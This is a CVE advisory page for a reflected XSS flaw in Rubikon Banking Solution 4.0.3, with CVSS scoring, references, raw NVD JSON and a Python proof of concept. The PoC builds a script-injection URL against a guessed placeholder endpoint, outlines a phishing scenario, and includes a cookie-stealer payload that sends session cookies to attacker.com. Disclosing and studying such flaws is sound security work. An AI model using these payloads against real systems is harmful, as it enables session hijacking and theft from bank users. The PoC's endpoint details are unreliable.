CVE-2025-60983

Description

Reflected Cross Site Scripting vulnerability in Rubikon Banking Solution 4.0.3 in the "Search For Customers Information" endpoints.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Rubikon Banking Solution 4.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import urllib.parse

# CVE-2025-60983 PoC - Reflected XSS in Rubikon Banking Solution
# Target: Search For Customers Information endpoint

def generate_xss_payload():
    """
    Generate malicious XSS payload for CVE-2025-60983
    This PoC demonstrates the reflected XSS vulnerability
    """
    # Basic XSS payload to test vulnerability
    xss_payload = '<script>alert("XSS Vulnerability - CVE-2025-60983")</script>'
    encoded_payload = urllib.parse.quote(xss_payload)
    
    # Target URL structure (example)
    base_url = "https://target-bank-system.com"
    search_endpoint = "/search/customers"
    
    # Malicious URL with XSS payload in search parameter
    malicious_url = f"{base_url}{search_endpoint}?search_term={encoded_payload}"
    
    print("=" * 60)
    print("CVE-2025-2025-60983 - Reflected XSS PoC")
    print("=" * 60)
    print(f"Target: Rubikon Banking Solution 4.0.3")
    print(f"Vulnerable Endpoint: Search For Customers Information")
    print(f"Payload: {xss_payload}")
    print(f"\nMalicious URL:")
    print(malicious_url)
    print("\n" + "=" * 60)
    print("Attack Scenario:")
    print("1. Attacker crafts malicious URL with XSS payload")
    print("2. Attacker sends URL to victim via phishing email")
    print("3. Victim clicks link and visits vulnerable page")
    print("4. Malicious script executes in victim's browser")
    print("5. Attacker steals session cookies or sensitive data")
    print("=" * 60)
    
    return malicious_url

def generate_cookie_stealer_payload():
    """
    Advanced payload for stealing session cookies
    """
    cookie_stealer = '''<script>document.location='https://attacker.com/steal?c='+document.cookie</script>'''
    encoded = urllib.parse.quote(cookie_stealer)
    return encoded

if __name__ == "__main__":
    generate_xss_payload()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60983
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60983
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60983/
[4] VulDB https://vuldb.com/cve/CVE-2025-60983
[5] https://github.com/handyteddy/Security-Advisories/blob/main/Rubikon-XSS.md
[6] https://github.com/handyteddy/Security-Advisories/blob/main/Rubikon-XSS.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60983", "sourceIdentifier": "[email protected]", "published": "2025-10-27T18:15:43.590", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reflected Cross Site Scripting vulnerability in Rubikon Banking Solution 4.0.3 in the \"Search For Customers Information\" endpoints."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/handyteddy/Security-Advisories/blob/main/Rubikon-XSS.md", "source": "[email protected]"}, {"url": "https://github.com/handyteddy/Security-Advisories/blob/main/Rubikon-XSS.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}